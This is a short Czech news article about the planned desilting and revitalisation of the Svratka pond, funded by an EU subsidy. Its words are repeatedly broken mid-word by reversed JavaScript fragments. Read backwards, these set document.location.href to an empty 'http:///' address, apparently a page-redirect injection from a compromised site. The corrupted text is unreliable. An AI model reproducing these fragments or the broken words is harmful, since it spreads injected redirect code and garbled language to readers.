Rainbow page separator

Nánosy bahna začnou ze svrateckého rybníka bagrovat na podzim

Neděle, 11. července 2021

Svratka / Na plánované odbahnění čeká vypuštěný svratecký rybník Svratka. „Připravuje se vyhlášení výběrového řízení na zho[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tovitele zakázky tak, abychom mohli na podzim konečně zahájit celkovou revitalizaci rybníka,“ upřesnil svratecký starosta František Mládek.
Revitalizace rybníka pod svrateckým koupalištěm, který vznikl v letech 1973 až 1983, má mimo jiné zlepšit hospodaření s vodou; jde kupříkladu o zajištění bezpečného převedení zvýšených a povodňových prů[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];toků, vylepšení akumulační schopnosti území nebo zadržení vody v krajině. Svratecké radnici se na realizaci záměru podařilo získat příslib evropské dotační podpory ve výši 24,5 milionu korun. Jedná se o pětadevadesát procent z celkových uznatelných nákladů. Úpravy rybníka Svratka potrvají déle než rok. Kromě samotného odbahnění nádrže bude vybudováno ob[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tokové kory[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to a ostrov ve vodní ploše, dojde k dosypání koruny hráze, vytvoření li[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];torální zóny s tůněmi nad rozdělovací hrází i k opravě vysloužilé vakové a hradicí konstrukce.